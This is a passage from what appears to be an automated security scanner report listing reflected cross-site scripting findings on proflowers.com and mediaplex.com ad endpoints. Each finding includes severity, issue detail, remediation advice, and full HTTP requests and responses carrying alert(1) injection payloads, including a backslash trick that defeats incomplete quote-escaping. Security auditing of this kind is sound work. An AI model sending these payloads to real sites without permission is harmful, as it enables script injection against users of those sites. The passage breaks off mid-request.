Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-1,cnd-34,pvo-1,pbr-3,psk-1,pps-1,poe-1,zzc-2,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-1,nte-1,ntc-2,peo-2,pfp-1,phr-2,zza-2,psv-4,nta-1,ntb-1,pmo-1,ppr-2,spg-2,xpc-1,psr-2,pcy-6,zzb-2,gfr-1,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 20:38:53 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 12:38:53 PM; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=10.10.0.133; domain=.proflowers.com; path=/
Set-Cookie: PFC_BrowserId=e699382a-91a1-43e0-99c9-f852222b990e; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Thu, 16-Dec-2060 20:38:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 20:38:52 GMT
Connection: close
Content-Length: 50660

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2010.12.13.1' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
";
s.prop13="false";
s.prop14="true";
s.prop16="";
s.prop28="e699382a-91a1-43e0-99c9-f852222b990e";
s.prop31=window.location.toString();

s.campaign="fgvprtlsbbc_ros_300x250slider_swork19holtrad2bd01\\";alert(1)//ea9eccb5d73";
s.eVar1="fgvprtlsbbc_ros_300x250slider_swork19holtrad2bd01\\";alert(1)//ea9eccb5d73";
s.eVar2="fgvprtlsbbc_ros_300x250slider_swork19holtrad2bd01\\";alert(1)//ea9eccb5d73";
s.eVar3="fgvprtlsbbc_ro
...[SNIP]...

2.2. https://accounts.proflowers.com/ManageOrderHistory.aspx [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /ManageOrderHistory.aspx

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 813bd\"%3balert(1)//2818af2d22a was submitted in the ref parameter. This input was echoed as 813bd\\";alert(1)//2818af2d22a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ManageOrderHistory.aspx?ref=fgvprtlsbbc_ros_300x250Slider_SWork19HolTrad813bd\"%3balert(1)//2818af2d22a HTTP/1.1
Host: accounts.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-33,pvo-1,pbr-4,psk-2,pps-2,poe-1,zzc-2,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-1,nte-3,ntc-2,peo-2,pfp-1,phr-1,zza-1,psv-3,nta-1,ntb-1,pmo-1,ppr-1,spg-2,xpc-1,psr-2,pcy-7,zzb-2,gfr-1,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 20:39:10 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 12:39:10 PM; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=10.10.0.103; domain=.proflowers.com; path=/
Set-Cookie: PFC_BrowserId=e0a6323a-e610-416a-ad82-e659342032af; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Thu, 16-Dec-2060 20:39:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 20:39:10 GMT
Connection: close
Content-Length: 58329

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2010.12.13.1' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
";
s.prop13="false";
s.prop14="true";
s.prop16="";
s.prop28="e0a6323a-e610-416a-ad82-e659342032af";
s.prop31=window.location.toString();

s.campaign="fgvprtlsbbc_ros_300x250slider_swork19holtrad813bd\\";alert(1)//2818af2d22a";
s.eVar1="fgvprtlsbbc_ros_300x250slider_swork19holtrad813bd\\";alert(1)//2818af2d22a";
s.eVar2="fgvprtlsbbc_ros_300x250slider_swork19holtrad813bd\\";alert(1)//2818af2d22a";
s.eVar3="fgvprtlsbbc_ro
...[SNIP]...

2.3. http://altfarm.mediaplex.com/ad/!js/12760-79049-22765-10 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/!js/12760-79049-22765-10

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d392'-alert(1)-'e082958d457 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/!js/12760-79049-22765-10?mpt=23159215d392'-alert(1)-'e082958d457&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/x%3B233415924%3B0-0%3B0%3B32918551%3B3454-728/90%3B39731796/39749583/1%3B%3B%7Eokv%3D%3Bslot%3Dleaderboard%3Bsz%3D728x90%2C970x66%2C970x90%3Bsectn%3Dnews%3Bctype%3Dindex%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dweatherhiclimate%3Breferrer_domain%3Dnews.bbc.co.uk%3Brsi%3DJ08781_10042%3B%7Esscs%3D%3f\ HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: mojo2=16775:22765/12760:22765/10105:22765; mojo3=16775:22765/12760:22765/13001:22765/10105:22765/14960:16817/9966:1105; svid=711791130703;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=12760:22765/16775:22765/13001:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 5:11:56 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 578
Date: Thu, 16 Dec 2010 20:38:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/x;233415924;0-0;0;32918551;3454-728/90;39731796/39749583/1;;~okv=;slot=leaderboard;sz=728x90,970x66,970x90;sect
...[SNIP]...
e_mpu_weather;adsense_middle=adsense_middle_weather;referrer=weatherhiclimate;referrer_domain=news.bbc.co.uk;rsi=J08781_10042;~sscs=?\http://altfarm.mediaplex.com/ad/ck/12760-79049-22765-10?mpt=23159215d392'-alert(1)-'e082958d457">
...[SNIP]...

2.4. http://altfarm.mediaplex.com/ad/!js/12760-79049-22765-10 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/!js/12760-79049-22765-10

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bc1b'%3balert(1)//ede101c1d09 was submitted in the mpvc parameter. This input was echoed as 3bc1b';alert(1)//ede101c1d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/!js/12760-79049-22765-10?mpt=2315921&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/x%3B233415924%3B0-0%3B0%3B32918551%3B3454-728/90%3B39731796/39749583/1%3B%3B%7Eokv%3D%3Bslot%3Dleaderboard%3Bsz%3D728x90%2C970x66%2C970x90%3Bsectn%3Dnews%3Bctype%3Dindex%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dweatherhiclimate%3Breferrer_domain%3Dnews.bbc.co.uk%3Brsi%3DJ08781_10042%3B%7Esscs%3D%3f\3bc1b'%3balert(1)//ede101c1d09 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: mojo2=16775:22765/12760:22765/10105:22765; mojo3=16775:22765/12760:22765/13001:22765/10105:22765/14960:16817/9966:1105; svid=711791130703;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=12760:22765/16775:22765/13001:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 6:22:00 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 578
Date: Thu, 16 Dec 2010 20:38:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/x;233415924;0-0;0;32918551;3454-728/90;39731796/39749583/1;;~okv=;slot=leaderboard;sz=728x90,970x66,970x90;sectn=news;ctype=index;weather=forcast;adsense_mpu=adsense_mpu_weather;adsense_middle=adsense_middle_weather;referrer=weatherhiclimate;referrer_domain=news.bbc.co.uk;rsi=J08781_10042;~sscs=?\3bc1b';alert(1)//ede101c1d09http://altfarm.mediaplex.com/ad/ck/12760-79049-22765-10?mpt=2315921">
...[SNIP]...

2.5. http://altfarm.mediaplex.com/ad/!js/12760-79049-22765-10 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/!js/12760-79049-22765-10

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24d26'-alert(1)-'d60040780eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/!js/12760-79049-22765-10?24d26'-alert(1)-'d60040780eb=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: mojo2=16775:22765/12760:22765/10105:22765; mojo3=16775:22765/12760:22765/13001:22765/10105:22765/14960:16817/9966:1105; svid=711791130703;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=12760:22765/16775:22765/13001:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 5:36:54 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 223
Date: Thu, 16 Dec 2010 19:51:29 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/12760-79049-22765-10?24d26'-alert(1)-'d60040780eb=1"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/12760/79049/728
...[SNIP]...

2.6. http://altfarm.mediaplex.com/ad/fm/12760-79049-22765-10 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/12760-79049-22765-10

Issue detail

The value of the mpt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a352c"><script>alert(1)</script>a383a397c93 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/fm/12760-79049-22765-10?mpt=2315921a352c"><script>alert(1)</script>a383a397c93&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/x%3B233415924%3B0-0%3B0%3B32918551%3B3454-728/90%3B39731796/39749583/1%3B%3B%7Eokv%3D%3Bslot%3Dleaderboard%3Bsz%3D728x90%2C970x66%2C970x90%3Bsectn%3Dnews%3Bctype%3Dindex%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dweatherhiclimate%3Breferrer_domain%3Dnews.bbc.co.uk%3Brsi%3DJ08781_10042%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://news.bbc.co.uk/weather/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=711791130703; mojo2=10105:22765; mojo3=13001:22765/16775:22765/10105:22765/14960:16817/9966:1105

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=12760:22765/13001:22765/16775:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 5:36:54 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 644
Date: Thu, 16 Dec 2010 20:01:12 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/x;233415924;0-0;0;32918551;3454-728/90;39731796/39749583/1;;~okv=;slot
...[SNIP]...
se_mpu_weather;adsense_middle=adsense_middle_weather;referrer=weatherhiclimate;referrer_domain=news.bbc.co.uk;rsi=J08781_10042;~sscs=?http://altfarm.mediaplex.com/ad/ck/12760-79049-22765-10?mpt=2315921a352c"><script>alert(1)</script>a383a397c93">
...[SNIP]...

2.7. http://altfarm.mediaplex.com/ad/fm/12760-79049-22765-10 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/12760-79049-22765-10

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29387"><script>alert(1)</script>9767cfd0c42 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/fm/12760-79049-22765-10?mpt=2315921&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/x%3B233415924%3B0-0%3B0%3B32918551%3B3454-728/90%3B39731796/39749583/1%3B%3B%7Eokv%3D%3Bslot%3Dleaderboard%3Bsz%3D728x90%2C970x66%2C970x90%3Bsectn%3Dnews%3Bctype%3Dindex%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dweatherhiclimate%3Breferrer_domain%3Dnews.bbc.co.uk%3Brsi%3DJ08781_10042%3B%7Esscs%3D%3f29387"><script>alert(1)</script>9767cfd0c42 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://news.bbc.co.uk/weather/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=711791130703; mojo2=10105:22765; mojo3=13001:22765/16775:22765/10105:22765/14960:16817/9966:1105

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=12760:22765/13001:22765/16775:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 6:22:00 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 644
Date: Thu, 16 Dec 2010 20:01:12 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/x;233415924;0-0;0;32918551;3454-728/90;39731796/39749583/1;;~okv=;slot
...[SNIP]...
x66,970x90;sectn=news;ctype=index;weather=forcast;adsense_mpu=adsense_mpu_weather;adsense_middle=adsense_middle_weather;referrer=weatherhiclimate;referrer_domain=news.bbc.co.uk;rsi=J08781_10042;~sscs=?29387"><script>alert(1)</script>9767cfd0c42http://altfarm.mediaplex.com/ad/ck/12760-79049-22765-10?mpt=2315921">
...[SNIP]...

2.8. http://altfarm.mediaplex.com/ad/fm/12760-79049-22765-10 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/12760-79049-22765-10

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b5c"><script>alert(1)</script>cbff5d453ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/fm/12760-79049-22765-10?18b5c"><script>alert(1)</script>cbff5d453ee=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: mojo2=16775:22765/12760:22765/10105:22765; mojo3=16775:22765/12760:22765/13001:22765/10105:22765/14960:16817/9966:1105; svid=711791130703;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=12760:22765/16775:22765/13001:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 5:07:00 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 290
Date: Thu, 16 Dec 2010 19:51:29 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/12760-79049-22765-10?18b5c"><script>alert(1)</script>cbff5d453ee=1"><img ismap bord
...[SNIP]...

2.9. http://altfarm.mediaplex.com/ad/js/13001-83639-22765-1 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13001-83639-22765-1

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0c55'-alert(1)-'e47cb3a5478 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13001-83639-22765-1?mpt=2295421b0c55'-alert(1)-'e47cb3a5478&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/a%3B230234285%3B0-0%3B0%3B32918551%3B3454-728/90%3B37780718/37798566/1%3B%3B%7Eokv%3D%3Bslot%3Dleaderboard%3Bsz%3D728x90%2C970x66%2C970x90%3Bsectn%3Dnews%3Bctype%3Dcontent%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dweatherforecast8%3Breferrer_domain%3Dnews.bbc.co.uk%3Brsi%3DJ08781_10042%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://news.bbc.co.uk/weather/hi/climate
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=711791130703; mojo3=16775:22765/10105:22765/13001:22765/14960:16817/9966:1105; mojo2=10105:22765

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=13001:22765/16775:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 5:36:54 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 602
Date: Thu, 16 Dec 2010 20:01:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/a;230234285;0-0;0;32918551;3454-728/90;37780718/37798566/1;;~okv=;slot=leaderboard;sz=728x90,970x66,970x90;sect
...[SNIP]...
nse_mpu_weather;adsense_middle=adsense_middle_weather;referrer=weatherforecast8;referrer_domain=news.bbc.co.uk;rsi=J08781_10042;~sscs=?http://altfarm.mediaplex.com/ad/ck/13001-83639-22765-1?mpt=2295421b0c55'-alert(1)-'e47cb3a5478">
...[SNIP]...

2.10. http://altfarm.mediaplex.com/ad/js/13001-83639-22765-1 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13001-83639-22765-1

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da3dc'%3balert(1)//ec89e26a06f was submitted in the mpvc parameter. This input was echoed as da3dc';alert(1)//ec89e26a06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13001-83639-22765-1?mpt=2295421&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/a%3B230234285%3B0-0%3B0%3B32918551%3B3454-728/90%3B37780718/37798566/1%3B%3B%7Eokv%3D%3Bslot%3Dleaderboard%3Bsz%3D728x90%2C970x66%2C970x90%3Bsectn%3Dnews%3Bctype%3Dcontent%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dweatherforecast8%3Breferrer_domain%3Dnews.bbc.co.uk%3Brsi%3DJ08781_10042%3B%7Esscs%3D%3fda3dc'%3balert(1)//ec89e26a06f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://news.bbc.co.uk/weather/hi/climate
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=711791130703; mojo3=16775:22765/10105:22765/13001:22765/14960:16817/9966:1105; mojo2=10105:22765

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=13001:22765/16775:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 6:32:02 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 602
Date: Thu, 16 Dec 2010 20:01:29 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a72/3/0/*/a;230234285;0-0;0;32918551;3454-728/90;37780718/37798566/1;;~okv=;slot=leaderboard;sz=728x90,970x66,970x90;sectn=news;ctype=content;weather=forcast;adsense_mpu=adsense_mpu_weather;adsense_middle=adsense_middle_weather;referrer=weatherforecast8;referrer_domain=news.bbc.co.uk;rsi=J08781_10042;~sscs=?da3dc';alert(1)//ec89e26a06fhttp://altfarm.mediaplex.com/ad/ck/13001-83639-22765-1?mpt=2295421">
...[SNIP]...

2.11. http://altfarm.mediaplex.com/ad/js/13001-83639-22765-1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13001-83639-22765-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4937'-alert(1)-'0691b17defb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13001-83639-22765-1?b4937'-alert(1)-'0691b17defb=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: mojo2=16775:22765/12760:22765/10105:22765; mojo3=16775:22765/12760:22765/13001:22765/10105:22765/14960:16817/9966:1105; svid=711791130703;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=13001:22765/16775:22765/12760:22765/10105:22765/14960:16817/9966:1105; expires=Sun, 16-Dec-2012 5:31:59 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 246
Date: Thu, 16 Dec 2010 19:51:22 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/13001-83639-22765-1?b4937'-alert(1)-'0691b17defb=1"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/13001/728x90_sol
...[SNIP]...

2.12. http://altfarm.mediaplex.com/ad/js/13001-83639-22765-2 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13001-83639-22765-2

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e228f'-alert(1)-'f5aa47bea46 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13001-83639-22765-2?mpt=1479889e228f'-alert(1)-'f5aa47bea46&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a72/3/0/%2a/u%3B230234298%3B0-0%3B0%3B32918551%3B62-120/240%3B36239235/36257113/1%3B%3B%7Eokv%3D%3Bslot%3Dbutton%3Bsz%3D120x240%3Bsectn%3Dnews%3Bctype%3Dcontent%3Bweather%3Dforcast%3Badsense_mpu%3Dadsense_mpu_weather%3Badsense_middle%3Dadsense_middle_weather%3Breferrer%3Dnonbbc%3Breferrer_domain%3Dburp%3Brsi%3DJ08781_10139%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
